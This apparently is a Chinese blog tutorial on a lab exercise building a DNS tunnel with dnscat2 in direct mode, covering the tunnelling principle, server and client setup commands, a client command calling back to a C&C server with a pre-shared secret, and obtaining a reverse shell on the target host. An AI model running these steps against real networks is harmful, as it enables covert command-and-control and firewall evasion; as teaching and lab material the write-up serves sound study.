网络安全内网渗透之DNS隧道实验--dnscat2直连模式

目录

一、DNS隧道攻击原理

二、DNS隧道工具

(一)安装dnscat2服务端

(二)启动服务器端

(三)在目标机器上安装客户端

(四)反弹shell


一、DNS隧道攻击原理

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上不是--返回的可以是任意字符串,包括加密的C&C指令。

二、DNS隧道工具

Dnscat2是一款开源软件,它使用DNS协议创建加密的C&C通信,通过预共享密钥进行身份验证;使用shell及DNS查询类型(A、AAAA、TXT、CNAME、MX),多个同时进行的会话类似SSH中的隧道。Dnscat2的客户端使用C语言编写的,服务端是用Ruby语言编写的。

使用dnscat2隧道的模式有两种,分别是直连模式和中继模式。

直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求;

中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢。

如果内网放行所有的DNS请求,dnscat2会使用直连模式,通过UDP的53端口进行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查询)。在请求日志中,所有的域名都是以"dnscat"开头的,因此防火墙可以很容易地将直连模式的通信检测出来。

如果内网中的请求仅限于白名单服务器或者特定的域,dnscat2会使用中继模式来申请一个域名,并将运行dnscat2服务端的服务器指定为受信任的DNS服务器。

本章实验以直连模式为测试模式。

(一)安装dnscat2服务端

dnscat2使用ubuntu系统,安装命令如下:

复制代码
​
apt-get install -y gem

apt-get install -y ruby-dev(注意安装的时候系统崩了,重启后使用命令dpkg --configure -a)

apt-get install -y libpq-dev

apt-get install -y ruby-bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

(二)启动服务器端

复制代码
ruby dnscat2.rb

(三)在目标机器上安装客户端

复制代码
​git clone https://github.com/iagox86/dnscat2.git

不能在线git clone的话,使用其他方式上传到目标主机。

复制代码
cd dnscat2/client/

make

./dnscat --dns server=192.168.101.105,port=53 --secret=9fb91ae03a857d46bd2c9b19ea9ef13a

结果如下:

服务端结果如下:

(四)反弹shell

使用windows查看可以连接的会话

window -i 1连接到会话1

help查看命令

shell命令执行后,创建window 4

使用window -i 4进入交互会话,ifconfig可以看到被控主机的IP是192.168.101.106,也就是dnscat客户端主机的IP地址

相关推荐
zskj_zhyl1 小时前
家庭健康能量站:微高压氧舱结合艾灸机器人,智享双重养生SPA
人工智能·科技·安全·机器人
肥仔哥哥19301 小时前
安全设计-防止非法移机
安全·非法移机·自助机的安全设计·设备的安全设计
网络安全创新研究院4 小时前
飞网揭秘:个人网络与团队网络功能对比
安全
Warren986 小时前
软件测试-Selenium学习笔记
java·javascript·笔记·学习·selenium·测试工具·安全
字节跳动安全中心6 小时前
智能体防御 | 一文了解3种系统提示词加固方法
安全·llm
黑客影儿10 小时前
黑客哲学之学习笔记系列(三)
笔记·学习·程序人生·安全·职场和发展·网络攻击模型·学习方法
XY_墨莲伊10 小时前
【网络安全实验报告】实验六: 病毒防护实验
安全·web安全
厦门辰迈智慧科技有限公司11 小时前
水闸安全综合监测系统解决方案
网络·物联网·安全·自动化·监测
深盾安全11 小时前
Python脚本安全防护策略全解析(下)
安全
叫我阿柒啊12 小时前
自学渗透,学会五分钟安装DVWA漏洞靶场
后端·安全